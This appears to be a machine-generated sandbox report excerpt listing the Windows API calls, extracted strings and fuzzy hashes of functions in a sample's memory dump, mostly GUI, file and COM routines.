                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1663942905-4108050209
                                                                            • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                            • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                            • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                            • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1481289235-0
                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                            • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                            • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                            • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                            • _wcslen.LIBCMT ref: 00460B00
                                                                            • __swprintf.LIBCMT ref: 00460B9E
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                            • GetDlgCtrlID.USER32 ref: 00460CE6
                                                                            • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                            • GetParent.USER32(?), ref: 00460D40
                                                                            • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                            • String ID: %s%u
                                                                            • API String ID: 1899580136-679674701
                                                                            • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                            • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                            • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                            • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                            APIs
                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                            • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                            • API String ID: 2485709727-934586222
                                                                            • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                            • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                            • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                            • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                            • _memset.LIBCMT ref: 004481BA
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                            • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID: X+
                                                                            • API String ID: 830647256-1938338529
                                                                            • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                            • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                            • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                            • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                            • String ID: HH
                                                                            • API String ID: 3381189665-2761332787
                                                                            • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                            • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                            • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                            • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                            APIs
                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                            • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                            • DeleteObject.GDI32(00000000), ref: 0046EB4F
                                                                            • DestroyIcon.USER32(00000000), ref: 0046EB67
                                                                            • DeleteObject.GDI32(09F8A736), ref: 0046EB7F
                                                                            • DestroyWindow.USER32 ref: 0046EB97
                                                                            • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                            • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                            • String ID: X+
                                                                            • API String ID: 802431696-1938338529
                                                                            • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                            • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                            • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                            • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00434585
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                            • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                            • String ID: (
                                                                            • API String ID: 3300687185-3887548279
                                                                            • Opcode ID: 209e2f7067df3e6dce0ce98e9e91acdecf4b3f60bb8595cd902f19eedb978ee7
                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                            • Opcode Fuzzy Hash: 209e2f7067df3e6dce0ce98e9e91acdecf4b3f60bb8595cd902f19eedb978ee7
                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                            APIs
                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                            • __swprintf.LIBCMT ref: 0045E4D9
                                                                            • _printf.LIBCMT ref: 0045E595
                                                                            • _printf.LIBCMT ref: 0045E5B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                            • API String ID: 3590180749-2894483878
                                                                            • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                            • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                            • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                            • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                            • LoadImageW.USER32 ref: 0046F929
                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                            • DeleteObject.GDI32(?), ref: 0046F950
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                            • LoadImageW.USER32 ref: 0046F9A8
                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                            • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                            • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                            • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                            • DeleteObject.GDI32(?), ref: 0046FA68
                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                            • String ID:
                                                                            • API String ID: 3412594756-0
                                                                            • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                            • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                            • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                            • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                            APIs
                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 4013263488-4113822522
                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                            • String ID:
                                                                            • API String ID: 228034949-0
                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004334F4
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00433533
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00433541
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0043354F
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                            • CopyImage.USER32 ref: 004335DB
                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3969911579-0
                                                                            • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                            • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                            • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                            • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                            APIs
                                                                            • GetParent.USER32 ref: 00445A8D
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                            • __wcsicoll.LIBCMT ref: 00445AC4
                                                                            • __wcsicoll.LIBCMT ref: 00445AE0
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 3125838495-3381328864
                                                                            • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                            • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                            • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                            • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                             • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CopyVariant$ErrorLast
                                                                            • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 2286883814-4206948668
                                                                            • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                            • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                            • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                            • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                            APIs
